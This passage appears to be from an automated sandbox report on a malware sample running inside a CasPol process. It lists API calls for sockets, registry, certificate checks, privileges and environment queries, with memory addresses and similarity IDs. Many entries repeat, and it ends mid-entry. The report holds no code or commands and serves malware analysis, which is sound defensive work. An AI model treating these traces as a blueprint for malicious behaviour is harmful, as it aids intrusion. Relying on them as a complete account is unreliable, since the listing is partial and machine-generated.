                                  Uniqueness Score: -1.00%

                                  APIs
                                  • getsockname.WS2_32(?,00000EA4,C151FFB0,00000000,00000000,00000000,00000000), ref: 010E49F7
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: getsockname
                                  • String ID:
                                  • API String ID: 3358416759-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • GetProcessTimes.KERNEL32(?,00000EA4,C151FFB0,00000000,00000000,00000000,00000000), ref: 010E18DD
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: ProcessTimes
                                  • String ID:
                                  • API String ID: 1995159646-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • CertVerifyCertificateChainPolicy.CRYPT32(?,00000EA4,C151FFB0,00000000,00000000,00000000,00000000), ref: 010E37EA
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: CertCertificateChainPolicyVerify
                                  • String ID:
                                  • API String ID: 3930008701-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • RegOpenKeyExW.KERNEL32(?,00000EA4), ref: 010E1F45
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: Open
                                  • String ID:
                                  • API String ID: 71445658-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • OpenFileMappingW.KERNELBASE(?,?), ref: 010E136D
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: FileMappingOpen
                                  • String ID:
                                  • API String ID: 1680863896-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • RegQueryValueExW.KERNEL32(?,00000EA4,?,?), ref: 1D5FA7BE
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5851794079.000000001D5FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D5FA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_1d5fa000_CasPol.jbxd
                                  Similarity
                                  • API ID: QueryValue
                                  • String ID:
                                  • API String ID: 3660427363-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • GetFileType.KERNEL32(?,00000EA4,C151FFB0,00000000,00000000,00000000,00000000), ref: 010E0995
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: FileType
                                  • String ID:
                                  • API String ID: 3081899298-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • LoadLibraryA.KERNEL32(?,00000EA4), ref: 010E023F
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID:
                                  • API String ID: 1029625771-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • CreateFileW.KERNEL32(?,?,?,?,?,?), ref: 010E08A9
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: CreateFile
                                  • String ID:
                                  • API String ID: 823142352-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • RegOpenKeyExW.KERNEL32(?,00000EA4), ref: 1D5FA5C9
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5851794079.000000001D5FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D5FA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_1d5fa000_CasPol.jbxd
                                  Similarity
                                  • API ID: Open
                                  • String ID:
                                  • API String ID: 71445658-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • GetAdaptersAddresses.IPHLPAPI(?,00000EA4,C151FFB0,00000000,00000000,00000000,00000000), ref: 010E2A45
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: AdaptersAddresses
                                  • String ID:
                                  • API String ID: 2506852604-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • WSAEventSelect.WS2_32(?,00000EA4,C151FFB0,00000000,00000000,00000000,00000000), ref: 010E1C8A
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: EventSelect
                                  • String ID:
                                  • API String ID: 31538577-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • RegOpenKeyExW.KERNEL32(?,00000EA4), ref: 010E46B2
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: Open
                                  • String ID:
                                  • API String ID: 71445658-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ReadFile.KERNEL32(?,00000EA4,C151FFB0,00000000,00000000,00000000,00000000), ref: 010E0B31
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: FileRead
                                  • String ID:
                                  • API String ID: 2738559852-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • RegOpenKeyExW.KERNEL32(?,00000EA4), ref: 010E213A
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: Open
                                  • String ID:
                                  • API String ID: 71445658-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • GetExitCodeProcess.KERNEL32(?,00000EA4,C151FFB0,00000000,00000000,00000000,00000000), ref: 1D5FB030
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5851794079.000000001D5FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D5FA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_1d5fa000_CasPol.jbxd
                                  Similarity
                                  • API ID: CodeExitProcess
                                  • String ID:
                                  • API String ID: 3861947596-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • GetNetworkParams.IPHLPAPI(?,00000EA4,C151FFB0,00000000,00000000,00000000,00000000), ref: 010E25C4
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: NetworkParams
                                  • String ID:
                                  • API String ID: 2134775280-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • CertVerifyCertificateChainPolicy.CRYPT32(?,00000EA4,C151FFB0,00000000,00000000,00000000,00000000), ref: 010E38D2
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: CertCertificateChainPolicyVerify
                                  • String ID:
                                  • API String ID: 3930008701-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • WSAIoctl.WS2_32(?,00000EA4,C151FFB0,00000000,00000000,00000000,00000000), ref: 010E1AC1
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: Ioctl
                                  • String ID:
                                  • API String ID: 3041054344-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • CreateMutexW.KERNEL32(?,?), ref: 010E1719
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: CreateMutex
                                  • String ID:
                                  • API String ID: 1964310414-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • RasConnectionNotificationW.RASAPI32(?,00000EA4,C151FFB0,00000000,00000000,00000000,00000000), ref: 010E1D63
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: ConnectionNotification
                                  • String ID:
                                  • API String ID: 1402429939-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • RegQueryValueExW.KERNEL32(?,00000EA4,C151FFB0,00000000,00000000,00000000,00000000), ref: 1D5FA6CC
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5851794079.000000001D5FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D5FA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_1d5fa000_CasPol.jbxd
                                  Similarity
                                  • API ID: QueryValue
                                  • String ID:
                                  • API String ID: 3660427363-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • RegQueryValueExW.KERNEL32(?,00000EA4,C151FFB0,00000000,00000000,00000000,00000000), ref: 010E47BC
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: QueryValue
                                  • String ID:
                                  • API String ID: 3660427363-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ioctlsocket.WS2_32(?,00000EA4,C151FFB0,00000000,00000000,00000000,00000000), ref: 010E19C3
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: ioctlsocket
                                  • String ID:
                                  • API String ID: 3577187118-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • WSAConnect.WS2_32(?,?,?,?,?,?,?), ref: 010E2B06
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: Connect
                                  • String ID:
                                  • API String ID: 3144859779-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • FindCloseChangeNotification.KERNEL32(?,C151FFB0,00000000,?,?,?,?,?,?,?,?,73343C68), ref: 1D5FABB8
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5851794079.000000001D5FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D5FA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_1d5fa000_CasPol.jbxd
                                  Similarity
                                  • API ID: ChangeCloseFindNotification
                                  • String ID:
                                  • API String ID: 2591292051-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • OpenFileMappingW.KERNELBASE(?,?), ref: 010E136D
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: FileMappingOpen
                                  • String ID:
                                  • API String ID: 1680863896-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • setsockopt.WS2_32(?,?,?,?,?), ref: 010E0E8C
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: setsockopt
                                  • String ID:
                                  • API String ID: 3981526788-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • K32GetModuleInformation.KERNEL32(?,00000EA4,C151FFB0,00000000,00000000,00000000,00000000), ref: 1D5FAE76
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5851794079.000000001D5FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D5FA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_1d5fa000_CasPol.jbxd
                                  Similarity
                                  • API ID: InformationModule
                                  • String ID:
                                  • API String ID: 3425974696-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • FindCloseChangeNotification.KERNEL32(?,C151FFB0,00000000,?,?,?,?,?,?,?,?,73343C68), ref: 1D5FA378
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5851794079.000000001D5FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D5FA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_1d5fa000_CasPol.jbxd
                                  Similarity
                                  • API ID: ChangeCloseFindNotification
                                  • String ID:
                                  • API String ID: 2591292051-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • WSASocketW.WS2_32(?,?,?,?,?), ref: 010E0DB6
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: Socket
                                  • String ID:
                                  • API String ID: 38366605-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 010E4C4E
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: DuplicateHandle
                                  • String ID:
                                  • API String ID: 3793708945-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: FileView
                                  • String ID:
                                  • API String ID: 3314676101-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 1D5FA8E2
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5851794079.000000001D5FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D5FA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_1d5fa000_CasPol.jbxd
                                  Similarity
                                  • API ID: LookupPrivilegeValue
                                  • String ID:
                                  • API String ID: 3899507212-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • MkParseDisplayName.OLE32(?,00000EA4,?,?), ref: 1D5FB612
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5851794079.000000001D5FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D5FA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_1d5fa000_CasPol.jbxd
                                  Similarity
                                  • API ID: DisplayNameParse
                                  • String ID:
                                  • API String ID: 3580041360-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • RegOpenCurrentUser.KERNEL32(?,00000EA4), ref: 010E1E39
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: CurrentOpenUser
                                  • String ID:
                                  • API String ID: 1571386571-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • RegNotifyChangeKeyValue.KERNEL32(?,00000EA4,C151FFB0,00000000,00000000,00000000,00000000), ref: 010E2044
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: ChangeNotifyValue
                                  • String ID:
                                  • API String ID: 3933585183-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • RegQueryValueExW.KERNEL32(?,00000EA4,C151FFB0,00000000,00000000,00000000,00000000), ref: 010E10D8
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: QueryValue
                                  • String ID:
                                  • API String ID: 3660427363-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • GetProcessTimes.KERNEL32(?,00000EA4,C151FFB0,00000000,00000000,00000000,00000000), ref: 010E18DD
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: ProcessTimes
                                  • String ID:
                                  • API String ID: 1995159646-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • K32EnumProcessModules.KERNEL32(?,00000EA4,C151FFB0,00000000,00000000,00000000,00000000), ref: 1D5FAD86
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5851794079.000000001D5FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D5FA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_1d5fa000_CasPol.jbxd
                                  Similarity
                                  • API ID: EnumModulesProcess
                                  • String ID:
                                  • API String ID: 1082081703-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • CertVerifyCertificateChainPolicy.CRYPT32(?,00000EA4,C151FFB0,00000000,00000000,00000000,00000000), ref: 010E37EA
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: CertCertificateChainPolicyVerify
                                  • String ID:
                                  • API String ID: 3930008701-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • WSAEventSelect.WS2_32(?,00000EA4,C151FFB0,00000000,00000000,00000000,00000000), ref: 010E1C8A
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: EventSelect
                                  • String ID:
                                  • API String ID: 31538577-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • getsockname.WS2_32(?,00000EA4,C151FFB0,00000000,00000000,00000000,00000000), ref: 010E49F7
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: getsockname
                                  • String ID:
                                  • API String ID: 3358416759-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • GetExitCodeProcess.KERNEL32(?,00000EA4,C151FFB0,00000000,00000000,00000000,00000000), ref: 1D5FB030
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5851794079.000000001D5FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D5FA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_1d5fa000_CasPol.jbxd
                                  Similarity
                                  • API ID: CodeExitProcess
                                  • String ID:
                                  • API String ID: 3861947596-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • SetErrorMode.KERNEL32(?,C151FFB0,00000000,?,?,?,?,?,?,?,?,73343C68), ref: 1D5FA4E8
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5851794079.000000001D5FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D5FA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_1d5fa000_CasPol.jbxd
                                  Similarity
                                  • API ID: ErrorMode
                                  • String ID:
                                  • API String ID: 2340568224-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ReadFile.KERNEL32(?,00000EA4,C151FFB0,00000000,00000000,00000000,00000000), ref: 010E0B31
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: FileRead
                                  • String ID:
                                  • API String ID: 2738559852-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • CertVerifyCertificateChainPolicy.CRYPT32(?,00000EA4,C151FFB0,00000000,00000000,00000000,00000000), ref: 010E38D2
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: CertCertificateChainPolicyVerify
                                  • String ID:
                                  • API String ID: 3930008701-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ioctlsocket.WS2_32(?,00000EA4,C151FFB0,00000000,00000000,00000000,00000000), ref: 010E19C3
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: ioctlsocket
                                  • String ID:
                                  • API String ID: 3577187118-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • GlobalMemoryStatusEx.KERNEL32(?,C151FFB0,00000000,?,?,?,?,?,?,?,?,73343C68), ref: 010E4874
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: GlobalMemoryStatus
                                  • String ID:
                                  • API String ID: 1890195054-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • VirtualAllocExNuma.KERNEL32(?,?,?,?,?,?,C151FFB0,00000000,?,?,?,?), ref: 1D5FB0F7
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5851794079.000000001D5FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D5FA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_1d5fa000_CasPol.jbxd
                                  Similarity
                                  • API ID: AllocNumaVirtual
                                  • String ID:
                                  • API String ID: 4233825816-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • shutdown.WS2_32(?,00000EA4,C151FFB0,00000000,00000000,00000000,00000000), ref: 010E1804
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: shutdown
                                  • String ID:
                                  • API String ID: 2510479042-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5851794079.000000001D5FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D5FA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_1d5fa000_CasPol.jbxd
                                  Similarity
                                  • API ID: Initialize
                                  • String ID:
                                  • API String ID: 2538663250-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: FindWindow
                                  • String ID:
                                  • API String ID: 134000473-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • LoadLibraryA.KERNEL32(?,00000EA4), ref: 010E023F
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID:
                                  • API String ID: 1029625771-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • GetAdaptersAddresses.IPHLPAPI(?,00000EA4,C151FFB0,00000000,00000000,00000000,00000000), ref: 010E2A45
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: AdaptersAddresses
                                  • String ID:
